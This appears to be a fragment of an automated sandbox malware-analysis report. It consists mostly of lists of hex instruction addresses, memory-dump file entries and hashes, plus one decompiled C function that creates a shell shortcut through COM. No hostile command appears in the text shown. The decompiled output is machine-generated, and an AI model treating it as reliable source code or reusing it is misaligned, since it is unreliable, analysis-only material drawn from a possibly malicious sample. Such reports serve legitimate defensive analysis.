                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00406cd6
                                                                                                                                                                                                                            0x00406cd9
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406ce9
                                                                                                                                                                                                                            0x00406cf1
                                                                                                                                                                                                                            0x00406cf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d12
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00406d1e
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d2c
                                                                                                                                                                                                                            0x00406d2f
                                                                                                                                                                                                                            0x00406d32
                                                                                                                                                                                                                            0x00406d37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ffe
                                                                                                                                                                                                                            0x00407002
                                                                                                                                                                                                                            0x00407020
                                                                                                                                                                                                                            0x00407023
                                                                                                                                                                                                                            0x0040702a
                                                                                                                                                                                                                            0x0040702d
                                                                                                                                                                                                                            0x00407030
                                                                                                                                                                                                                            0x00407033
                                                                                                                                                                                                                            0x00407036
                                                                                                                                                                                                                            0x00407039
                                                                                                                                                                                                                            0x0040703b
                                                                                                                                                                                                                            0x00407042
                                                                                                                                                                                                                            0x00407043
                                                                                                                                                                                                                            0x00407045
                                                                                                                                                                                                                            0x00407048
                                                                                                                                                                                                                            0x0040704b
                                                                                                                                                                                                                            0x0040704e
                                                                                                                                                                                                                            0x0040704e
                                                                                                                                                                                                                            0x00407053
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407053
                                                                                                                                                                                                                            0x00407004
                                                                                                                                                                                                                            0x00407007
                                                                                                                                                                                                                            0x0040700a
                                                                                                                                                                                                                            0x00407014
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407068
                                                                                                                                                                                                                            0x0040706c
                                                                                                                                                                                                                            0x0040708f
                                                                                                                                                                                                                            0x00407092
                                                                                                                                                                                                                            0x00407095
                                                                                                                                                                                                                            0x0040709f
                                                                                                                                                                                                                            0x0040706e
                                                                                                                                                                                                                            0x0040706e
                                                                                                                                                                                                                            0x00407071
                                                                                                                                                                                                                            0x00407074
                                                                                                                                                                                                                            0x00407077
                                                                                                                                                                                                                            0x00407084
                                                                                                                                                                                                                            0x00407087
                                                                                                                                                                                                                            0x00407087
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070ab
                                                                                                                                                                                                                            0x004070af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070b5
                                                                                                                                                                                                                            0x004070b9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070bf
                                                                                                                                                                                                                            0x004070c1
                                                                                                                                                                                                                            0x004070c5
                                                                                                                                                                                                                            0x004070c5
                                                                                                                                                                                                                            0x004070c8
                                                                                                                                                                                                                            0x004070cc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040711c
                                                                                                                                                                                                                            0x00407120
                                                                                                                                                                                                                            0x00407127
                                                                                                                                                                                                                            0x0040712a
                                                                                                                                                                                                                            0x0040712d
                                                                                                                                                                                                                            0x00407137
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407137
                                                                                                                                                                                                                            0x00407122
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407143
                                                                                                                                                                                                                            0x00407147
                                                                                                                                                                                                                            0x0040714e
                                                                                                                                                                                                                            0x00407151
                                                                                                                                                                                                                            0x00407154
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407157
                                                                                                                                                                                                                            0x0040715a
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x00407160
                                                                                                                                                                                                                            0x00407163
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407169
                                                                                                                                                                                                                            0x00407170
                                                                                                                                                                                                                            0x00407175
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407207
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x0040720d
                                                                                                                                                                                                                            0x00407210
                                                                                                                                                                                                                            0x00407213
                                                                                                                                                                                                                            0x00407217
                                                                                                                                                                                                                            0x0040721a
                                                                                                                                                                                                                            0x00407220
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407225
                                                                                                                                                                                                                            0x00407228
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407286
                                                                                                                                                                                                                            0x00407286
                                                                                                                                                                                                                            0x0040728a
                                                                                                                                                                                                                            0x004075b1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075b1
                                                                                                                                                                                                                            0x00407290
                                                                                                                                                                                                                            0x00407293
                                                                                                                                                                                                                            0x00407296
                                                                                                                                                                                                                            0x0040729a
                                                                                                                                                                                                                            0x0040729d
                                                                                                                                                                                                                            0x004072a3
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407056
                                                                                                                                                                                                                            0x00407056
                                                                                                                                                                                                                            0x00407059
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407395
                                                                                                                                                                                                                            0x00407399
                                                                                                                                                                                                                            0x004073bb
                                                                                                                                                                                                                            0x004073be
                                                                                                                                                                                                                            0x004073c8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073c8
                                                                                                                                                                                                                            0x0040739b
                                                                                                                                                                                                                            0x0040739e
                                                                                                                                                                                                                            0x004073a2
                                                                                                                                                                                                                            0x004073a5
                                                                                                                                                                                                                            0x004073a5
                                                                                                                                                                                                                            0x004073a8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407452
                                                                                                                                                                                                                            0x00407456
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x0040747b
                                                                                                                                                                                                                            0x00407482
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00407458
                                                                                                                                                                                                                            0x0040745b
                                                                                                                                                                                                                            0x0040745e
                                                                                                                                                                                                                            0x00407461
                                                                                                                                                                                                                            0x00407468
                                                                                                                                                                                                                            0x004073ac
                                                                                                                                                                                                                            0x004073ac
                                                                                                                                                                                                                            0x004073af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407543
                                                                                                                                                                                                                            0x00407546
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717f
                                                                                                                                                                                                                            0x00407186
                                                                                                                                                                                                                            0x00407187
                                                                                                                                                                                                                            0x00407189
                                                                                                                                                                                                                            0x0040718c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407194
                                                                                                                                                                                                                            0x00407197
                                                                                                                                                                                                                            0x0040719a
                                                                                                                                                                                                                            0x0040719c
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719f
                                                                                                                                                                                                                            0x004071a2
                                                                                                                                                                                                                            0x004071a9
                                                                                                                                                                                                                            0x004071ac
                                                                                                                                                                                                                            0x004071ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407493
                                                                                                                                                                                                                            0x0040749a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x004074a3
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x004074a9
                                                                                                                                                                                                                            0x004074ac
                                                                                                                                                                                                                            0x004074af
                                                                                                                                                                                                                            0x004074b3
                                                                                                                                                                                                                            0x004074b6
                                                                                                                                                                                                                            0x004074bc
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074cb
                                                                                                                                                                                                                            0x0040752b
                                                                                                                                                                                                                            0x0040752e
                                                                                                                                                                                                                            0x00407533
                                                                                                                                                                                                                            0x00407534
                                                                                                                                                                                                                            0x00407536
                                                                                                                                                                                                                            0x00407538
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x00407317
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x0040731a
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x00407234
                                                                                                                                                                                                                            0x00407237
                                                                                                                                                                                                                            0x00407239
                                                                                                                                                                                                                            0x0040723c
                                                                                                                                                                                                                            0x0040723f
                                                                                                                                                                                                                            0x00407242
                                                                                                                                                                                                                            0x00407244
                                                                                                                                                                                                                            0x00407247
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x00407250
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x004071dd
                                                                                                                                                                                                                            0x004071e0
                                                                                                                                                                                                                            0x004071e2
                                                                                                                                                                                                                            0x004071e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070d3
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070dc
                                                                                                                                                                                                                            0x004070df
                                                                                                                                                                                                                            0x004070e2
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e7
                                                                                                                                                                                                                            0x004070ea
                                                                                                                                                                                                                            0x004070ed
                                                                                                                                                                                                                            0x004070f0
                                                                                                                                                                                                                            0x004070f3
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                                                                                                                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                                                                                                                                                            0x004021b3
                                                                                                                                                                                                                            0x004021bd
                                                                                                                                                                                                                            0x004021c7
                                                                                                                                                                                                                            0x004021d1
                                                                                                                                                                                                                            0x004021dc
                                                                                                                                                                                                                            0x004021df
                                                                                                                                                                                                                            0x004021f9
                                                                                                                                                                                                                            0x004021fc
                                                                                                                                                                                                                            0x00402202
                                                                                                                                                                                                                            0x00402205
                                                                                                                                                                                                                            0x0040220f
                                                                                                                                                                                                                            0x00402213
                                                                                                                                                                                                                            0x00402213
                                                                                                                                                                                                                            0x00402218
                                                                                                                                                                                                                            0x00402229
                                                                                                                                                                                                                            0x00402231
                                                                                                                                                                                                                            0x004022e8
                                                                                                                                                                                                                            0x004022e8
                                                                                                                                                                                                                            0x004022ef
                                                                                                                                                                                                                            0x00402237
                                                                                                                                                                                                                            0x00402237
                                                                                                                                                                                                                            0x00402246
                                                                                                                                                                                                                            0x0040224a
                                                                                                                                                                                                                            0x0040224d
                                                                                                                                                                                                                            0x00402253
                                                                                                                                                                                                                            0x00402261
                                                                                                                                                                                                                            0x00402264
                                                                                                                                                                                                                            0x00402266
                                                                                                                                                                                                                            0x00402271
                                                                                                                                                                                                                            0x00402271
                                                                                                                                                                                                                            0x00402276
                                                                                                                                                                                                                            0x00402278
                                                                                                                                                                                                                            0x0040227f
                                                                                                                                                                                                                            0x0040227f
                                                                                                                                                                                                                            0x00402282
                                                                                                                                                                                                                            0x0040228b
                                                                                                                                                                                                                            0x0040228e
                                                                                                                                                                                                                            0x00402294
                                                                                                                                                                                                                            0x00402296
                                                                                                                                                                                                                            0x004022a0
                                                                                                                                                                                                                            0x004022a0
                                                                                                                                                                                                                            0x004022a3
                                                                                                                                                                                                                            0x004022ac
                                                                                                                                                                                                                            0x004022af
                                                                                                                                                                                                                            0x004022b8
                                                                                                                                                                                                                            0x004022be
                                                                                                                                                                                                                            0x004022c0
                                                                                                                                                                                                                            0x004022ce
                                                                                                                                                                                                                            0x004022ce
                                                                                                                                                                                                                            0x004022d1
                                                                                                                                                                                                                            0x004022d7
